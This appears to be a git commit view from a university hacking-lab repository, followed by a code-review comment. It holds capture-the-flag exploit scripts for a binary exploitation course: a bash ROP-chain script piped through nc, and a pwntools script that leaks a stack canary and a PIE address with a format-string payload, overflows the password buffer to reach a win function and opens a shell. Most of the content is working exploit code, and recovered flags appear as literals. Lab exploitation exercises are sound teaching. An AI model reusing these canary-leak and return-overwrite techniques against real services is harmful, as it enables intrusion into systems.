4c3e281ef5
...
3e0859b09e
| Author | SHA1 | Date | |
|---|---|---|---|
| 3e0859b09e | |||
| a4dc06d7e1 |
@@ -1,15 +1,11 @@
|
||||
# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
|
||||
|
||||
#objdump
|
||||
#00000000004011d6 g F .text 000000000000003a win
|
||||
|
||||
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
|
||||
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
|
||||
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
|
||||
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
|
||||
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
|
||||
CMDADDR="\x48\x40\x40\00\00\00\00\00"
|
||||
CMDCALL="\xd6\x11\x40\00\00\00\00\00"
|
||||
#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
|
||||
STACKPT="\x02\00\00\00\00\00\00\00"
|
||||
|
||||
read
|
||||
read
|
||||
@@ -26,7 +22,7 @@ read input
|
||||
>&2 echo $input
|
||||
|
||||
>&2 echo "writing canary + exploit"
|
||||
printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
|
||||
printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
|
||||
read input
|
||||
>&2 echo "should be bye: "$input
|
||||
printf "cat flag.txt\n"
|
||||
|
||||
82
4/level7/test.py
Normal file
@@ -0,0 +1,82 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
BINARY = "./level7"
|
||||
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
|
||||
#HOST, PORT = "localhost", 4007
|
||||
|
||||
elf = ELF(BINARY, checksec=False)
|
||||
|
||||
def main():
|
||||
# 1) start remote
|
||||
p = remote(HOST, PORT)
|
||||
|
||||
# 2) read the question
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
|
||||
p.sendline(payload.encode())
|
||||
print("sending: ", end='')
|
||||
print(payload)
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
##############
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got username prompt:", question.decode().strip())
|
||||
|
||||
# 3) build payload
|
||||
#offset = 32
|
||||
win = elf.symbols['win']
|
||||
#payload = b"A"*offset
|
||||
#payload += 0xa6#p64(win)
|
||||
#payload += b"\n"
|
||||
payload = "%7$p %9$p"
|
||||
p.sendline(payload.encode())
|
||||
print("sending: ", end='')
|
||||
print(payload)
|
||||
|
||||
leak = p.recvline(timeout=999)
|
||||
print("[+] leak:", leak)
|
||||
canary = int(leak[-35:-17],16)
|
||||
pieaddr = int(leak[-16:-2],16)
|
||||
print("[+] canary:", hex(canary))
|
||||
print("[+] pieaddr:", hex(pieaddr))
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got username prompt:", question.decode().strip())
|
||||
|
||||
p.sendline("admin".encode())
|
||||
print("sending username \"admin\"")
|
||||
|
||||
question = p.recvline(timeout=999)
|
||||
print("[+] got username msg:", question.decode().strip())
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got password prompt:", question.decode().strip())
|
||||
|
||||
payload = b"A"*40
|
||||
payload += p64(canary)
|
||||
payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
|
||||
payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
|
||||
p.sendline(payload)
|
||||
print("sending payload: ", payload)
|
||||
|
||||
question = p.recvline(timeout=999)
|
||||
print("[+] got login msg:", question.decode().strip())
|
||||
|
||||
|
||||
# 5) we should now have a shell
|
||||
p.interactive()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
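Review bot: The parsing at `canary = int(leak[-35:-17],16)` and the `pieaddr` line after it assume `recvline` returned a complete line; if the read times out pwntools returns empty bytes, and the slices then fail inside `int()` with a message that never says the service went silent, so guard it first with `if not leak: raise RuntimeError("no leak line received")`. The `.decode()` calls on every received prompt likewise raise `UnicodeDecodeError` on any non-UTF-8 byte the service emits; for log output `question.decode(errors="replace")` is the safer form, and the repeated recv/print pairs would read better as one small helper. The module also commits a recovered flag as a string literal on the `payload = "hacklab{...}"` line and leaves several commented-out payload lines in place; the secret belongs in a file kept out of version control and the dead lines should be deleted. `main()` has no docstring; a one-line `"""Drive the remote level7 session prompt by prompt and hand control to the user at the end."""` would state the sequence that the numbered comments only partly cover.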